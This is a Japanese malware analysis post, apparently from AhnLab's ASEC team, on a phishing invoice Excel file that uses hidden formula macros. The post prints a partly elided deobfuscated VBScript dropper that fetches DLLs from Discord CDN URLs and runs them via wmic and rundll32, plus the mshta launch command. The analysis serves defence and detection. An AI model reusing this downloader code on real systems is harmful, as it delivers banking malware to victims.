ASEC 分析チームは最近、Invoice に偽装した不正な Excel ドキュメントを確認した。この Excel ファイルは Invoice-[数字]_日付.xlsb というファイル名でメールに添付される形で配布されている。以下は、韓国国内で出回っている不正なメールである。
メールに添付された Excel ファイルを開くと編集が制限されており、以下のように特定の画像が表示され、ユーザーのクリックを誘導する。
また、この画像にはマクロが指定されており、ユーザーが画像をクリックすることでマクロが実行され、不正な振る舞いを行う。Macro1 シートは非表示のシートとして存在し、このシートには以下の図4のように複数の数式がいくつものセルに分かれている。
ユーザーが画像をクリックすると、以下のような警告ウィンドウが表示される。その後、これに対して [OK] や [閉じる] ボタンをクリックすることで、不正な振る舞いが実行される。
その後、実行されたマクロは \%APPDATA%\Microsoft\Excel\XLSTART フォルダーの excel.rtf にファイルを生成し、wmic process call create ‘mshta \%APPDATA%\Microsoft\Excel\XLSTART\excel.rtf’ コマンドでそのファイルを実行する。
excel.rtf ファイルは html ファイルであり、内部には多数のコメントを挿入する等によって、ユーザーが認知しにくい形式にされた不正な VBScript が存在する。以下は、難読化を除去した excel.rtf ファイルのスクリプトである。
<!DOCTYPE html>
<html>
<head>
---中略---
<script type="text/vbscript" LANGUAGE="VBScript" >
Set hRpLar = CreateObject("Wscript.Shell")
fpCHuctA = Replace(hRpLar.expandenvironmentstrings("%LOGONSERVER%"), CHR(92), "")
RBfOKtU = hRpLar.expandenvironmentstrings("%USERDOMAIN%")
If LCase(fpCHuctA) <> LCase(RBfOKtU) Then
For Each WvpdWK in Array("https://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll")
Set UWXaoFp = CreateObject("Scripting.FileSystemObject")
If Not UWXaoFp.FileExists("C:\\ProgramData\spprgrss.png") Then
---中略---
with FiTmVH
.type = 1
.open
.write djGHweg.responseBody
.savetofile "C:\\ProgramData\spprgrss.png", 2
.close
end with
With CreateObject("Wscript.Shell")
.Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe" & Chr(34))
End With
---省略---このスクリプトには %LOGONSERVER% と %USERDOMAIN% の変数値をチェックするコードが存在する。一般ユーザーの場合は当該値が同一なためダウンロードが実行されないことから、AD 環境のユーザーをターゲットにしたマルウェアと推定される。
%LOGONSERVER% と %USERDOMAIN% に設定された値が異なる場合、追加の不正なファイルのダウンロードが行われ、ダウンロードしたファイルは ProgramData フォルダーに spprgrss.png で保存されたあと、wmic process call create “rundll32.exe C:\\ProgramData\spprgrss.png BrandMe” によって実行する。
以下は、このスクリプトに含まれているダウンロード URL である。
- hxxps://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll
- hxxps://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll
- hxxps://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll
現在は上記 URL へのアクセスが不可能であり、追加のファイルダウンロードが行われないが、dridex 等のバンキング型マルウェアをダウンロードするものと推定される。
VBA マクロを含む Excel ファイルだけでなく、このように数式マクロを使用する Excel ファイルも持続的に確認されている。これまでも強調してきたように、不明なユーザーから受信したメールの添付ファイルは開かないようにしなければならない。また、ファイルに含まれている不正なマクロが自動で実行されないよう、注意しなければならない。
現在 V3 では、このマルウェアを以下のように検知している。
[ファイル検知]
- Downloader/XLS.Generic
[IOC]
- 8b645dcfa487c9146a9c5b08aeeeb230
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報